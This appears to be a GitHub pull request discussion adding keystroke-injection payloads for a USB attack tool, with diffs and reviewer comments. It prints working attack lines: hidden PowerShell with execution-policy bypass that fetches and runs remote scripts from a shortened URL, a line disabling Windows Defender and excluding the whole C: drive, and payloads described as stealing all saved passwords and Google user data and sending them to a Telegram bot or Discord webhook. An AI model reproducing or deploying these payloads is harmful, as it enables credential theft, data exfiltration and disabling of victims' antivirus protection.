1 New Mobile IOS payload | 2 New Exfiltration payloads #410
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mr-Proxy-source
commented
Dec 16, 2023
•
Mr-Proxy-source
commented
- Added payload for opening links for IOS 17 and older
- Added Lazagne exfil payload for exfiltrating all passwords through telegram bot
- Added Google exfil payload that uses 7zip to zip user data, upload it to file-sharing service and send download link through telegram bot or discord webhook.
- Fixed some mistakes in Copy and Waste
Mr-Proxy-source
changed the title
Line 10 added r after GUI, line 11 added delay.
This payload runs powershell script that zip google user data, uses gofile.io api to upload it, and then sends download link to telegram bot or discord webhook.
Mr-Proxy-source
changed the title
dallaswinger
reviewed
Jan 2, 2024
| DELAY 500 | ||
| REM If you want to use Telegram change just bot token and chat id | ||
| REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook | ||
| STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex |
There was a problem hiding this comment.
There was a problem hiding this comment.
dallaswinger
reviewed
Jan 2, 2024
| DELAY 1500 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'" |
There was a problem hiding this comment.
There was a problem hiding this comment.
dallaswinger
reviewed
Jan 2, 2024
| DELAY 1000 | ||
| GUI SPACE | ||
| DELAY 250 | ||
| REM Put your link down there ↓ |
There was a problem hiding this comment.
I added defining for url
|
All requested changes have been made, if there is anything else let me know. |
Changed to example.com
Changed to example.com
hak5peaks
requested changes
Jun 17, 2024
| DELAY 500 | ||
| REM If you want to use Telegram change just bot token and chat id | ||
| REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook | ||
| STRING powershell -w h -NoP -Ep Bypass -Command $botToken='BOT_TOKEN'; $chatID='CHAT_ID'; $webhook='DC_WEBHOOK'; irm SCRIPT_URL | iex |
There was a problem hiding this comment.
the only DEFINE being called is for SCRIPT_URL. You need to add # to your defines. for example:
DEFINE #BOT_TOKEN your-bot-token
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1
DEFINE #DC_WEBHOOK your-webhook
DEFINE #CHAT_ID your-chat-id
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='#BOT_TOKEN'; $chatID='#CHAT_ID'; $webhook='#DC_WEBHOOK'; irm #SCRIPT_URL | iex
its not required you do it with SCRIPT_URL its still highly recommended.
| DELAY 1500 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TOKEN'; $ci='CHAT_ID'; irm SCRIPT_URL | iex'" |
There was a problem hiding this comment.
the only DEFINE being called is for SCRIPT_URL. You need to add # to your defines. for example:
DEFINE #BOT_TOKEN your-bot-token
DEFINE #CHAT_ID your-chat-id
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='#BOT_TOKEN'; $ci='#CHAT_ID'; irm #SCRIPT_URL | iex'"
its not required you do it with SCRIPT_URL its still highly recommended.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.